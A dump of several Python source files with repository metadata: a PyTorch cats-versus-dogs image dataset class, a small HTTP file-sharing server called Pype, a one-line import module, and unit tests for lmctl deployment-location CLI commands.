93d2f527097223517648213bbf23f839ac7551a3 | 748 | py | Python | sanity_check/dataset.py | skn123/GaborNet | 26c10d3fd4b2a82239c52bb60ca9659fb98456ac | [
"MIT"
] | 51 | 2019-03-10T13:01:45.000Z | 2022-03-31T08:34:54.000Z | sanity_check/dataset.py | skn123/GaborNet | 26c10d3fd4b2a82239c52bb60ca9659fb98456ac | [
"MIT"
] | 16 | 2019-07-24T06:58:12.000Z | 2021-05-07T07:28:21.000Z | sanity_check/dataset.py | skn123/GaborNet | 26c10d3fd4b2a82239c52bb60ca9659fb98456ac | [
"MIT"
] | 19 | 2019-11-20T02:14:49.000Z | 2022-03-29T08:46:33.000Z | from __future__ import division
from __future__ import print_function
import os
from skimage import io
from torch.utils.data import Dataset
| 26.714286 | 67 | 0.667112 | from __future__ import division
from __future__ import print_function
import os
from skimage import io
from torch.utils.data import Dataset
class DogsCatsDataset(Dataset):
    """Binary classification dataset over a flat directory of image files.

    Every file in ``root_dir`` is one sample.  Filenames containing
    "cat" get target 0; everything else (dogs) gets target 1.
    """
    def __init__(self, root_dir: str, transform=None):
        """
        Args:
            root_dir: directory containing the image files.
            transform: optional callable applied to each loaded image.
        """
        self.root_dir = root_dir
        # Sort the listing so sample index -> file is deterministic across
        # runs and platforms (os.listdir returns entries in arbitrary order).
        self.pics_list = sorted(os.listdir(self.root_dir))
        self.transform = transform
    def __len__(self):
        """Number of samples (files) in the dataset."""
        return len(self.pics_list)
    def __getitem__(self, idx):
        """Load one sample: {'image': ndarray, 'target': 0 (cat) or 1 (dog)}."""
        img_name = os.path.join(self.root_dir, self.pics_list[idx])
        # Filenames such as 'cat.123.jpg' / 'dog.456.jpg' encode the label.
        target = 0 if "cat" in self.pics_list[idx] else 1
        image = io.imread(img_name)
        if self.transform:
            image = self.transform(image)
        sample = {"image": image, "target": target}
        return sample
| 492 | 10 | 103 |
8a9e1907fd42117845c46ac1a624f31b4890f303 | 11,977 | py | Python | pype.py | H4ckd4ddy/Pype | 3e71fbfaa232ec177d5ed24d72f74fc0a9fecb96 | [
"MIT"
] | null | null | null | pype.py | H4ckd4ddy/Pype | 3e71fbfaa232ec177d5ed24d72f74fc0a9fecb96 | [
"MIT"
] | null | null | null | pype.py | H4ckd4ddy/Pype | 3e71fbfaa232ec177d5ed24d72f74fc0a9fecb96 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
###########################################
# #
# "Pype" #
# Simple file sharing server, #
# to upload and download file #
# from CLI #
# #
# Etienne SELLAN #
# 17/10/2018 #
# #
###########################################
import sys
import time
import signal
import threading
from threading import Thread
from http.server import HTTPServer, BaseHTTPRequestHandler
from socketserver import ThreadingMixIn
import os
import binascii
import shutil
import base64
import math
import hashlib
# SETTINGS BEGIN
settings = {}
settings["url"] = "https://pype.sellan.fr"
settings["listen_address"] = "0.0.0.0"
settings["port"] = 80
settings["directory"] = "/tmp"
settings["delete_limit"] = 24 # hours
settings["cleaning_interval"] = 1 # hours
settings["id_length"] = 2 # bytes
settings["max_name_length"] = 64 # chars
settings["max_file_size"] = (10*1000*1000*1000) # bytes
# SETTINGS END
if __name__ == "__main__":
server = Thread(target=run_on, args=[int(settings["port"])])
server.daemon = True
server.start()
initialisation()
# Launch auto cleaning interval
set_interval(clean_files, (int(settings["cleaning_interval"]) * 3600))
signal.pause()
| 41.442907 | 165 | 0.56859 | #!/usr/bin/env python3
###########################################
# #
# "Pype" #
# Simple file sharing server, #
# to upload and download file #
# from CLI #
# #
# Etienne SELLAN #
# 17/10/2018 #
# #
###########################################
import sys
import time
import signal
import threading
from threading import Thread
from http.server import HTTPServer, BaseHTTPRequestHandler
from socketserver import ThreadingMixIn
import os
import binascii
import shutil
import base64
import math
import hashlib
# SETTINGS BEGIN
settings = {}
settings["url"] = "https://pype.sellan.fr"
settings["listen_address"] = "0.0.0.0"
settings["port"] = 80
settings["directory"] = "/tmp"
settings["delete_limit"] = 24 # hours
settings["cleaning_interval"] = 1 # hours
settings["id_length"] = 2 # bytes
settings["max_name_length"] = 64 # chars
settings["max_file_size"] = (10*1000*1000*1000) # bytes
# SETTINGS END
def settings_initialisation():
    """Apply environment overrides ('pype_<key>') to the module-level
    settings dict, then record the directory this script lives in."""
    for key in list(settings):
        env_name = "pype_" + key
        if env_name in os.environ:
            settings[key] = os.environ[env_name]
    settings["current_directory"] = os.path.dirname(os.path.realpath(__file__))
def path_to_array(path):
    """Split a slash-separated path into its non-empty segments."""
    return [segment for segment in path.split('/') if segment]
def array_to_path(path_array):
    """Join path segments back into an absolute, slash-separated path."""
    return '/' + '/'.join(path_array)
def path_initialisation():
    """Compute the storage directory (settings['directory']/pype) as a
    segment list in the module-level `directory`, creating it if missing."""
    global directory
    directory = path_to_array(settings["directory"])
    directory.append("pype")
    # Create directory for Pype if not exist
    if not os.path.exists(array_to_path(directory)):
        os.makedirs(array_to_path(directory), 666)  # NOTE(review): 666 is decimal (mode 0o1232); 0o666 was probably intended — confirm
def initialisation():
    """Run all one-time start-up steps: settings first, then storage path."""
    settings_initialisation()
    path_initialisation()
class request_handler(BaseHTTPRequestHandler):
    """HTTP handler for Pype.

    GET serves the home page / help / install script and downloads stored
    files; PUT uploads a file and returns its share URL.  Stored files are
    named by the sha512 hex digest of their request path, so arbitrary
    request paths cannot escape the storage directory.
    """
    def do_GET(self): # For home page and download
        """Serve home page, help, install script, ribbon image, file info
        or the file content itself; '?info' shows metadata, '?delete'
        removes the file after a successful download."""
        # Check for options
        if '?' in self.path:
            # Split options of request
            self.option = self.path.split('?')[1]
            self.request_path = self.path.split('?')[0]
        else:
            # No options
            self.option = None
            self.request_path = self.path
        # Stored filename is the digest of the full request path (token + name).
        path_digest = hashlib.sha512(self.request_path.encode('utf-8')).hexdigest()
        # Convert path of request to array for easy manipulation
        self.request_path = path_to_array(self.request_path)
        # Construct full path of the file
        self.file_path = directory+[path_digest]
        if len(self.request_path) > 0:
            if self.request_path[0] == "help":
                self.send_response(200)
                self.send_header('Content-type', 'text/html')
                self.end_headers()
                with open(settings["current_directory"]+'/'+'help.txt', 'r') as help_file:
                    self.wfile.write(str.encode(help_file.read().replace("[url]", settings["url"])+"\n"))
            elif self.request_path[0] == "install":
                self.send_response(200)
                self.send_header('Content-type', 'text/html')
                self.end_headers()
                with open(settings["current_directory"]+'/'+'alias.sh', 'r') as alias_file:
                    self.wfile.write(str.encode(alias_file.read().replace("[url]", settings["url"])+"\n"))
            elif self.request_path[0] == "Github-ribbon.png":
                with open(settings["current_directory"]+'/'+'Github-ribbon.png', 'rb') as image:
                    self.send_response(200)
                    self.send_header('Content-type', 'image/png')
                    self.end_headers()
                    self.wfile.write(image.read())
            elif os.path.exists(array_to_path(self.file_path)):
                with open(array_to_path(self.file_path), 'rb') as self.file:
                    # Load file stats
                    self.file.stat = os.fstat(self.file.fileno())
                    if self.option == "info":
                        self.send_response(200)
                        self.send_header('Content-type', 'text/html')
                        self.end_headers()
                        self.response = "Name: {}\nSize: {}\nCountdown: {} \n"
                        # Seconds until the periodic cleaner deletes the file.
                        self.file.countdown = round(((int(settings["delete_limit"]) * 3600) + self.file.stat.st_ctime) - time.time())
                        # Place data in response
                        self.response = self.response.format(self.request_path[-1], human_readable(self.file.stat.st_size), human_readable_time(self.file.countdown))
                        # Send response
                        self.wfile.write(str.encode(self.response))
                    else:
                        self.send_response(200)
                        self.send_header("Content-Type", 'application/octet-stream')
                        contentDisposition = 'attachment; filename="{}"'
                        contentDisposition = contentDisposition.format(self.request_path[-1])
                        self.send_header("Content-Disposition", contentDisposition)
                        self.send_header("Content-Length", str(self.file.stat.st_size))
                        self.end_headers()
                        # Stream the file to the client without loading it in memory.
                        shutil.copyfileobj(self.file, self.wfile)
                        # If user want deleted file after download
                        if self.option == "delete":
                            os.remove(array_to_path(self.file_path))
                            print("{} deleted !\n".format(array_to_path(self.file_path)))
            else:
                self.send_response(404)
                self.send_header('Content-type', 'text/html')
                self.end_headers()
                self.response = "File not found \n"
                self.wfile.write(str.encode(self.response))
        else:
            # Root path: curl clients get plain-text help, browsers get HTML.
            if "curl" in self.headers['User-Agent'].lower():
                self.send_response(200)
                self.send_header('Content-type', 'text/html')
                self.end_headers()
                with open(settings["current_directory"]+'/'+'help.txt', 'r') as help_file:
                    self.wfile.write(str.encode(help_file.read().replace("[url]", settings["url"])+"\n"))
            else:
                # Open HTML homepage file
                with open(settings["current_directory"]+'/'+'index.html', 'r') as homepage:
                    self.send_response(200)
                    self.send_header('Content-type', 'text/html')
                    self.end_headers()
                    # Send HTML page with replaced data
                    self.wfile.write(str.encode(homepage.read().replace("[url]", settings["url"])))
        return
    def do_PUT(self): # For upload
        """Store the request body under a fresh random token and return
        the shareable download URL.  Rejects over-long names and bodies
        larger than settings['max_file_size']."""
        # Get the request size in header
        self.file_size = int(self.headers['Content-Length'])
        self.file_name = self.path.split("/")[-1] # Only take the file name
        if len(self.file_name) > int(settings["max_name_length"]): # Check file name length
            self.send_response(400) # Send error header
            self.send_header('Content-type', 'text/plain') # Send mime
            self.end_headers() # Close header
            HTML_error = "Error: Too long file name (max {} chars)\n"
            HTML_error = HTML_error.format(settings["max_name_length"])
            self.wfile.write(str.encode(HTML_error)) # Return error
            return
        if self.file_size > int(settings["max_file_size"]): # Check file size
            self.send_response(400) # Send error header
            self.send_header('Content-type', 'text/plain') # Send mime
            self.end_headers() # Close header
            HTML_error = "Error: Too big file (max {})\n"
            HTML_error = HTML_error.format(human_readable(int(settings["max_file_size"])))
            self.wfile.write(str.encode(HTML_error)) # Return error
            return
        # Read content from request
        # NOTE(review): this buffers the whole upload (up to max_file_size) in memory.
        content = self.rfile.read(self.file_size)
        # Loop for generating uniq token
        while "Bad token":
            # Get random token from urandom
            random_token = binascii.hexlify(os.urandom(int(settings["id_length"]))).decode()
            # If directory not exist -> token free
            path_digest = hashlib.sha512(('/'+random_token+'/'+self.file_name).encode('utf-8')).hexdigest()
            if not os.path.isfile(array_to_path(directory+[path_digest])):
                break
        # Concat the new file full path
        self.file_path = directory+[path_digest]
        # Open tmp new file to write binary data
        current_file = open(array_to_path(self.file_path), "wb")
        # Write content of request
        current_file.write(content)
        current_file.close()
        self.send_response(200) # Send success header
        self.send_header('Content-type', 'text/html') # Send mime
        self.end_headers() # Close header
        # Return new file url to user
        self.wfile.write(str.encode(settings["url"]+"/"+random_token+"/"+self.file_name+"\n"))
        return
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
    """HTTPServer that handles each request in its own thread."""
    pass
def run_on(port):
    """Print the start-up banner and serve HTTP forever (blocking).

    NOTE(review): the `port` argument is unused — the server binds to
    settings["port"] below; confirm whether the parameter should be used.
    """
    print("\n")
    print("/-------------------------------\\")
    print("| Starting Pype on port {} |".format(str(settings["port"]).rjust(5, " ")))
    print("\\-------------------------------/")
    print("\n")
    print("Reminder : \n")
    print("To upload : curl -T file.txt {}".format(settings["url"]))
    print("To download : curl {}/[id]/file.txt > files.txt".format(settings["url"]))
    print("\n\nLogs : \n")
    server_address = (settings["listen_address"], int(settings["port"]))
    httpd = ThreadedHTTPServer(server_address, request_handler)
    httpd.serve_forever()
def human_readable(bytes): # Convert bytes to human readable string format
    """Format a byte count as a short size string, e.g. '2.0 Ko'.

    The value is repeatedly divided by 1024 and any fractional part is
    truncated to two digits.
    """
    units = ['o', 'Ko', 'Mo', 'Go', 'To', 'Po']
    cursor = 0
    # Guard the cursor so absurdly large inputs cannot run past the units list.
    while bytes > 1024 and cursor < len(units) - 1:
        bytes /= 1024
        cursor += 1
    value = str(bytes)
    # Only truncate a fractional part when one exists: for inputs <= 1024
    # the value is still an int and str() contains no '.' (the previous
    # unconditional value[1] indexing raised IndexError in that case).
    if '.' in value:
        whole, frac = value.split('.')
        value = whole + '.' + frac[:2]
    return value + ' ' + units[cursor]
def human_readable_time(seconds): # Convert time in seconds to human readable string format
    """Render a duration as a rounded-up count of the largest fitting unit,
    e.g. '2 minutes'."""
    unit_names = ['second', 'minute', 'hour', 'day', 'week', 'month', 'year']
    unit_sizes = [60, 60, 24, 7, 4, 12, 99]
    index = 0
    # Climb to the largest unit the remaining amount still exceeds.
    while seconds > unit_sizes[index]:
        seconds /= unit_sizes[index]
        index += 1
    amount = math.ceil(seconds)
    suffix = 's' if amount > 1 else ''
    return '{0} {1}{2}'.format(amount, unit_names[index], suffix)
def set_interval(func, time):
    """Call *func* every *time* seconds, forever (blocking).

    Uses Event.wait as an interruptible sleep; the event is never set,
    so the loop only ends with the process.
    NOTE: the `time` parameter shadows the stdlib `time` module here.
    """
    e = threading.Event()
    while not e.wait(time):
        func()
def clean_files():
    """Delete stored files older than settings['delete_limit'] hours
    (by st_ctime) and print the names that were removed."""
    # Create list of deleted files
    removed = []
    now = time.time()
    # Compute the limit date from settings
    limit_date = now - (int(settings["delete_limit"]) * 3600)
    for file in os.listdir(array_to_path(directory)):
        if os.path.isfile(array_to_path(directory+[file])):
            # Get informations about this file
            stats = os.stat(array_to_path(directory+[file]))
            timestamp = stats.st_ctime
            if timestamp < limit_date:
                removed.append(file)
                os.remove(array_to_path(directory+[file]))
    if len(removed) > 0:
        print("Files removed : {}".format(', '.join(removed)))
if __name__ == "__main__":
    # Serve HTTP in a daemon thread so the main thread can run the
    # periodic cleaner and wait for signals.
    # NOTE(review): the server thread starts before initialisation()
    # runs, so environment overrides of settings["port"]/["directory"]
    # may be applied after the server reads them — confirm ordering.
    server = Thread(target=run_on, args=[int(settings["port"])])
    server.daemon = True
    server.start()
    initialisation()
    # Launch auto cleaning interval
    set_interval(clean_files, (int(settings["cleaning_interval"]) * 3600))
    signal.pause()
| 10,114 | 66 | 329 |
ac6da38df846f52bb1d9bf88f1cf9e03dcfbad23 | 40 | py | Python | website/addons/googledrive/views/__init__.py | lbanner/osf.io | 1898ef0ff8bd91713e94c60e7463b5f81ac62caa | [
"Apache-2.0"
] | null | null | null | website/addons/googledrive/views/__init__.py | lbanner/osf.io | 1898ef0ff8bd91713e94c60e7463b5f81ac62caa | [
"Apache-2.0"
] | 1 | 2019-08-16T13:45:12.000Z | 2019-08-16T13:45:12.000Z | website/addons/googledrive/views/__init__.py | lbanner/osf.io | 1898ef0ff8bd91713e94c60e7463b5f81ac62caa | [
"Apache-2.0"
] | null | null | null | from .import hgrid, auth, config # noqa | 40 | 40 | 0.725 | from .import hgrid, auth, config # noqa | 0 | 0 | 0 |
07cf3ba334257d1613f71f2f937520edea323681 | 23,134 | py | Python | tests/unit/cli/commands/test_deployment_location.py | rajahaidar/lmctl | 48984047d3656eca51a382bdfb936304cf48d5aa | [
"Apache-2.0"
] | null | null | null | tests/unit/cli/commands/test_deployment_location.py | rajahaidar/lmctl | 48984047d3656eca51a382bdfb936304cf48d5aa | [
"Apache-2.0"
] | null | null | null | tests/unit/cli/commands/test_deployment_location.py | rajahaidar/lmctl | 48984047d3656eca51a382bdfb936304cf48d5aa | [
"Apache-2.0"
] | null | null | null | import tests.unit.cli.commands.command_testing as command_testing
import lmctl.drivers.lm.base as lm_drivers
import lmctl.cli.commands.deployment_location as deployment_cmds
import tempfile
import shutil
import os
import json
import yaml
from unittest.mock import patch
from tests.common.simulations.lm_simulator import LmSimulator
| 63.554945 | 214 | 0.595963 | import tests.unit.cli.commands.command_testing as command_testing
import lmctl.drivers.lm.base as lm_drivers
import lmctl.cli.commands.deployment_location as deployment_cmds
import tempfile
import shutil
import os
import json
import yaml
from unittest.mock import patch
from tests.common.simulations.lm_simulator import LmSimulator
class TestDeploymentLocationCommands(command_testing.CommandTestCase):
    def setUp(self):
        """Patch lmctl's session factory to return a simulated LM backend
        (with one resource manager 'rm123') before each test."""
        super().setUp()
        # Created simulated LM session when requested
        self.lm_sim = LmSimulator().start()
        create_lm_session_patcher = patch('lmctl.cli.ctlmgmt.create_lm_session')
        self.mock_create_lm_session = create_lm_session_patcher.start()
        self.mock_create_lm_session.return_value = self.lm_sim.as_mocked_session()
        # Ensure the patch is undone even if a test fails.
        self.addCleanup(create_lm_session_patcher.stop)
        self.lm_sim.add_rm({'name': 'rm123'})
def test_add_with_defaults(self):
result = self.runner.invoke(deployment_cmds.add, ['TestEnv', 'testdl', '--rm', 'rm123'])
self.assert_no_errors(result)
expected_id = None
for dl_id, dl in self.lm_sim.deployment_locations.items():
expected_id = dl_id
expected_output = '| id | name | resourceManager | infrastructureType | description |'
expected_output += '\n|--------------------------------------+--------+-------------------+----------------------+---------------|'
expected_output += '\n| {0} | testdl | rm123 | | |'.format(expected_id)
self.assert_output(result, expected_output)
self.mock_create_lm_session.assert_called_once_with('TestEnv', None, None)
mock_dl_driver = self.mock_create_lm_session.return_value.deployment_location_driver
mock_dl_driver.add_location.assert_called_once_with({'name': 'testdl', 'description': None, 'resourceManager': 'rm123', 'infrastructureType': None, 'infrastructureSpecificProperties': {}})
def test_add_with_params(self):
result = self.runner.invoke(deployment_cmds.add, ['TestEnv', 'testdl', '--rm', 'rm123', '-i', 'Openstack', '-d', 'test location'])
self.assert_no_errors(result)
expected_id = None
for dl_id, dl in self.lm_sim.deployment_locations.items():
expected_id = dl_id
expected_output = '| id | name | resourceManager | infrastructureType | description |'
expected_output += '\n|--------------------------------------+--------+-------------------+----------------------+---------------|'
expected_output += '\n| {0} | testdl | rm123 | Openstack | test location |'.format(expected_id)
self.assert_output(result, expected_output)
self.mock_create_lm_session.assert_called_once_with('TestEnv', None, None)
mock_dl_driver = self.mock_create_lm_session.return_value.deployment_location_driver
mock_dl_driver.add_location.assert_called_once_with({'name': 'testdl', 'description': 'test location', 'resourceManager': 'rm123', 'infrastructureType': 'Openstack', 'infrastructureSpecificProperties': {}})
def test_add_with_json_properties(self):
tmp_dir = tempfile.mkdtemp()
try:
properties_dict = {
'propA': 'valueA'
}
properties_file = os.path.join(tmp_dir, 'props.json')
with open(properties_file, 'w') as f:
json.dump(properties_dict, f)
result = self.runner.invoke(deployment_cmds.add, ['TestEnv', 'testdl', '--rm', 'rm123', '-p', properties_file])
self.assert_no_errors(result)
expected_id = None
for dl_id, dl in self.lm_sim.deployment_locations.items():
expected_id = dl_id
expected_output = '| id | name | resourceManager | infrastructureType | description |'
expected_output += '\n|--------------------------------------+--------+-------------------+----------------------+---------------|'
expected_output += '\n| {0} | testdl | rm123 | | |'.format(expected_id)
self.assert_output(result, expected_output)
self.mock_create_lm_session.assert_called_once_with('TestEnv', None, None)
mock_dl_driver = self.mock_create_lm_session.return_value.deployment_location_driver
mock_dl_driver.add_location.assert_called_once_with({'name': 'testdl', 'description': None, 'resourceManager': 'rm123', 'infrastructureType': None, 'infrastructureSpecificProperties': properties_dict})
finally:
if os.path.exists(tmp_dir):
shutil.rmtree(tmp_dir)
def test_add_with_yaml_properties(self):
tmp_dir = tempfile.mkdtemp()
try:
properties_dict = {
'propA': 'valueA'
}
properties_file = os.path.join(tmp_dir, 'props.yaml')
with open(properties_file, 'w') as f:
yaml.dump(properties_dict, f)
result = self.runner.invoke(deployment_cmds.add, ['TestEnv', 'testdl', '--rm', 'rm123', '-p', properties_file])
self.assert_no_errors(result)
expected_id = None
for dl_id, dl in self.lm_sim.deployment_locations.items():
expected_id = dl_id
expected_output = '| id | name | resourceManager | infrastructureType | description |'
expected_output += '\n|--------------------------------------+--------+-------------------+----------------------+---------------|'
expected_output += '\n| {0} | testdl | rm123 | | |'.format(expected_id)
self.assert_output(result, expected_output)
self.mock_create_lm_session.assert_called_once_with('TestEnv', None, None)
mock_dl_driver = self.mock_create_lm_session.return_value.deployment_location_driver
mock_dl_driver.add_location.assert_called_once_with({'name': 'testdl', 'description': None, 'resourceManager': 'rm123', 'infrastructureType': None, 'infrastructureSpecificProperties': properties_dict})
finally:
if os.path.exists(tmp_dir):
shutil.rmtree(tmp_dir)
def test_add_with_config(self):
result = self.runner.invoke(deployment_cmds.add, ['TestEnv', 'testdl', '--rm', 'rm123', '--config', 'my/config/file'])
self.assert_no_errors(result)
expected_id = None
for dl_id, dl in self.lm_sim.deployment_locations.items():
expected_id = dl_id
expected_output = '| id | name | resourceManager | infrastructureType | description |'
expected_output += '\n|--------------------------------------+--------+-------------------+----------------------+---------------|'
expected_output += '\n| {0} | testdl | rm123 | | |'.format(expected_id)
self.assert_output(result, expected_output)
self.mock_create_lm_session.assert_called_once_with('TestEnv', None, 'my/config/file')
def test_add_with_pwd(self):
result = self.runner.invoke(deployment_cmds.add, ['TestEnv', 'testdl', '--rm', 'rm123', '--pwd', 'secret'])
self.assert_no_errors(result)
expected_id = None
for dl_id, dl in self.lm_sim.deployment_locations.items():
expected_id = dl_id
expected_output = '| id | name | resourceManager | infrastructureType | description |'
expected_output += '\n|--------------------------------------+--------+-------------------+----------------------+---------------|'
expected_output += '\n| {0} | testdl | rm123 | | |'.format(expected_id)
self.assert_output(result, expected_output)
self.mock_create_lm_session.assert_called_once_with('TestEnv', 'secret', None)
def test_add_with_output_json_format(self):
result = self.runner.invoke(deployment_cmds.add, ['TestEnv', 'testdl', '--rm', 'rm123', '-f', 'json'])
self.assert_no_errors(result)
expected_id = None
for dl_id, dl in self.lm_sim.deployment_locations.items():
expected_id = dl_id
expected_output = '{'
expected_output += '\n \"name\": \"testdl\",'
expected_output += '\n \"description\": null,'
expected_output += '\n \"resourceManager\": \"rm123\",'
expected_output += '\n \"infrastructureType\": null,'
expected_output += '\n \"infrastructureSpecificProperties\": {},'
expected_output += '\n \"id\": \"{0}\"'.format(expected_id)
expected_output += '\n}'
self.assert_output(result, expected_output)
self.mock_create_lm_session.assert_called_once_with('TestEnv', None, None)
def test_add_with_output_yaml_format(self):
result = self.runner.invoke(deployment_cmds.add, ['TestEnv', 'testdl', '--rm', 'rm123', '-f', 'yaml'])
self.assert_no_errors(result)
expected_id = None
for dl_id, dl in self.lm_sim.deployment_locations.items():
expected_id = dl_id
expected_output = 'name: testdl'
expected_output += '\ndescription: null'
expected_output += '\nresourceManager: rm123'
expected_output += '\ninfrastructureType: null'
expected_output += '\ninfrastructureSpecificProperties: {}'
expected_output += '\nid: {0}\n'.format(expected_id)
self.assert_output(result, expected_output)
self.mock_create_lm_session.assert_called_once_with('TestEnv', None, None)
def test_add_handles_lm_driver_error(self):
self.mock_create_lm_session.return_value.deployment_location_driver.add_location.side_effect = lm_drivers.LmDriverException('Mocked error')
result = self.runner.invoke(deployment_cmds.add, ['TestEnv', 'testdl', '--rm', 'rm123'])
self.assert_has_system_exit(result)
expected_output = 'LM error occurred: Mocked error'
self.assert_output(result, expected_output)
def test_delete_with_defaults(self):
dl_id = '123'
dl_name = 'abc'
self.lm_sim.add_deployment_location({'id': dl_id, 'name': dl_name, 'resourceManager': 'rm123'})
result = self.runner.invoke(deployment_cmds.delete, ['TestEnv', dl_name])
self.assert_no_errors(result)
expected_output = 'Deleting deployment location: {0}...'.format(dl_id)
expected_output += '\nDeleted deployment location: {0}'.format(dl_id)
self.assert_output(result, expected_output)
self.mock_create_lm_session.assert_called_once_with('TestEnv', None, None)
mock_dl_driver = self.mock_create_lm_session.return_value.deployment_location_driver
mock_dl_driver.get_locations_by_name.assert_called_once_with(dl_name)
mock_dl_driver.delete_location.assert_called_once_with(dl_id)
def test_delete_with_config(self):
dl_id = '123'
dl_name = 'abc'
self.lm_sim.add_deployment_location({'id': dl_id, 'name': dl_name, 'resourceManager': 'rm123'})
result = self.runner.invoke(deployment_cmds.delete, ['TestEnv', dl_name, '--config', 'my/config/file'])
self.assert_no_errors(result)
expected_output = 'Deleting deployment location: {0}...'.format(dl_id)
expected_output += '\nDeleted deployment location: {0}'.format(dl_id)
self.assert_output(result, expected_output)
self.mock_create_lm_session.assert_called_once_with('TestEnv', None, 'my/config/file')
def test_delete_with_pwd(self):
dl_id = '123'
dl_name = 'abc'
self.lm_sim.add_deployment_location({'id': dl_id, 'name': dl_name, 'resourceManager': 'rm123'})
result = self.runner.invoke(deployment_cmds.delete, ['TestEnv', dl_name, '--pwd', 'secret'])
self.assert_no_errors(result)
expected_output = 'Deleting deployment location: {0}...'.format(dl_id)
expected_output += '\nDeleted deployment location: {0}'.format(dl_id)
self.assert_output(result, expected_output)
self.mock_create_lm_session.assert_called_once_with('TestEnv', 'secret', None)
def test_delete_handles_lm_driver_error(self):
result = self.runner.invoke(deployment_cmds.delete, ['TestEnv', 'SomeDl'])
self.assert_has_system_exit(result)
expected_output = 'Error: No deployment location with name: SomeDl'
self.assert_output(result, expected_output)
def test_get_with_defaults(self):
dl_id = 'f801fa73-6278-42f0-b5d3-a0fe40675327'
dl_name = 'testdl'
self.lm_sim.add_deployment_location({'id': dl_id, 'name': dl_name, 'resourceManager': 'rm123'})
result = self.runner.invoke(deployment_cmds.get, ['TestEnv', dl_name])
self.assert_no_errors(result)
expected_output = '| id | name | resourceManager | infrastructureType | description |'
expected_output += '\n|--------------------------------------+--------+-------------------+----------------------+---------------|'
expected_output += '\n| {0} | testdl | rm123 | | |'.format(dl_id)
self.assert_output(result, expected_output)
self.mock_create_lm_session.assert_called_once_with('TestEnv', None, None)
mock_dl_driver = self.mock_create_lm_session.return_value.deployment_location_driver
mock_dl_driver.get_locations_by_name.assert_called_once_with(dl_name)
def test_get_with_config(self):
dl_id = 'f801fa73-6278-42f0-b5d3-a0fe40675327'
dl_name = 'testdl'
self.lm_sim.add_deployment_location({'id': dl_id, 'name': dl_name, 'resourceManager': 'rm123'})
result = self.runner.invoke(deployment_cmds.get, ['TestEnv', dl_name, '--config', 'my/config/file'])
self.assert_no_errors(result)
expected_output = '| id | name | resourceManager | infrastructureType | description |'
expected_output += '\n|--------------------------------------+--------+-------------------+----------------------+---------------|'
expected_output += '\n| {0} | testdl | rm123 | | |'.format(dl_id)
self.assert_output(result, expected_output)
self.mock_create_lm_session.assert_called_once_with('TestEnv', None, 'my/config/file')
def test_get_with_pwd(self):
dl_id = 'f801fa73-6278-42f0-b5d3-a0fe40675327'
dl_name = 'testdl'
self.lm_sim.add_deployment_location({'id': dl_id, 'name': dl_name, 'resourceManager': 'rm123'})
result = self.runner.invoke(deployment_cmds.get, ['TestEnv', dl_name, '--pwd', 'secret'])
self.assert_no_errors(result)
expected_output = '| id | name | resourceManager | infrastructureType | description |'
expected_output += '\n|--------------------------------------+--------+-------------------+----------------------+---------------|'
expected_output += '\n| {0} | testdl | rm123 | | |'.format(dl_id)
self.assert_output(result, expected_output)
self.mock_create_lm_session.assert_called_once_with('TestEnv', 'secret', None)
def test_get_not_found(self):
result = self.runner.invoke(deployment_cmds.get, ['TestEnv', 'SomeDl'])
self.assert_has_system_exit(result)
expected_output = 'Error: No deployment location with name: SomeDl'
self.assert_output(result, expected_output)
self.mock_create_lm_session.assert_called_once_with('TestEnv', None, None)
    def test_get_with_output_json_format(self):
        """Get with -f json should emit the location as pretty-printed JSON."""
        dl_id = 'f801fa73-6278-42f0-b5d3-a0fe40675327'
        dl_name = 'testdl'
        self.lm_sim.add_deployment_location({'id': dl_id, 'name': dl_name, 'resourceManager': 'rm123'})
        result = self.runner.invoke(deployment_cmds.get, ['TestEnv', dl_name, '-f', 'json'])
        self.assert_no_errors(result)
        # Expected text mirrors the JSON serializer's indentation exactly; whitespace is significant.
        expected_output = '{'
        expected_output += '\n  \"id\": \"{0}\",'.format(dl_id)
        expected_output += '\n  \"name\": \"{0}\",'.format(dl_name)
        expected_output += '\n  \"resourceManager\": \"rm123\"'
        expected_output += '\n}'
        self.assert_output(result, expected_output)
        self.mock_create_lm_session.assert_called_once_with('TestEnv', None, None)
    def test_get_with_output_yaml_format(self):
        """Get with -f yaml should emit the location as YAML."""
        dl_id = 'f801fa73-6278-42f0-b5d3-a0fe40675327'
        dl_name = 'testdl'
        self.lm_sim.add_deployment_location({'id': dl_id, 'name': dl_name, 'resourceManager': 'rm123'})
        result = self.runner.invoke(deployment_cmds.get, ['TestEnv', dl_name, '-f', 'yaml'])
        self.assert_no_errors(result)
        # The YAML dump ends with a trailing newline, hence the final '\n'.
        expected_output = 'id: {0}'.format(dl_id)
        expected_output += '\nname: {0}'.format(dl_name)
        expected_output += '\nresourceManager: rm123\n'
        self.assert_output(result, expected_output)
        self.mock_create_lm_session.assert_called_once_with('TestEnv', None, None)
def test_list_with_defaults(self):
dl_A_id = 'f801fa73-6278-42f0-b5d3-a0fe40675327'
dl_A_name = 'testdl_a'
self.lm_sim.add_deployment_location({'id': dl_A_id, 'name': dl_A_name, 'resourceManager': 'rm123'})
dl_B_id = 'c502bc73-6278-42e0-a5e3-a0fe40674754'
dl_B_name = 'testdl_b'
self.lm_sim.add_deployment_location({'id': dl_B_id, 'name': dl_B_name, 'resourceManager': 'rm123'})
result = self.runner.invoke(deployment_cmds.list_locations, ['TestEnv'])
self.assert_no_errors(result)
expected_output = '| id | name | resourceManager | infrastructureType | description |'
expected_output += '\n|--------------------------------------+----------+-------------------+----------------------+---------------|'
expected_output += '\n| f801fa73-6278-42f0-b5d3-a0fe40675327 | testdl_a | rm123 | | |'
expected_output += '\n| c502bc73-6278-42e0-a5e3-a0fe40674754 | testdl_b | rm123 | | |'
self.assert_output(result, expected_output)
self.mock_create_lm_session.assert_called_once_with('TestEnv', None, None)
mock_dl_driver = self.mock_create_lm_session.return_value.deployment_location_driver
mock_dl_driver.get_locations.assert_called_once()
def test_list_with_config(self):
dl_id = 'f801fa73-6278-42f0-b5d3-a0fe40675327'
dl_name = 'testdl'
self.lm_sim.add_deployment_location({'id': dl_id, 'name': dl_name, 'resourceManager': 'rm123'})
result = self.runner.invoke(deployment_cmds.list_locations, ['TestEnv', '--config', 'my/config/file'])
self.assert_no_errors(result)
expected_output = '| id | name | resourceManager | infrastructureType | description |'
expected_output += '\n|--------------------------------------+--------+-------------------+----------------------+---------------|'
expected_output += '\n| {0} | testdl | rm123 | | |'.format(dl_id)
self.assert_output(result, expected_output)
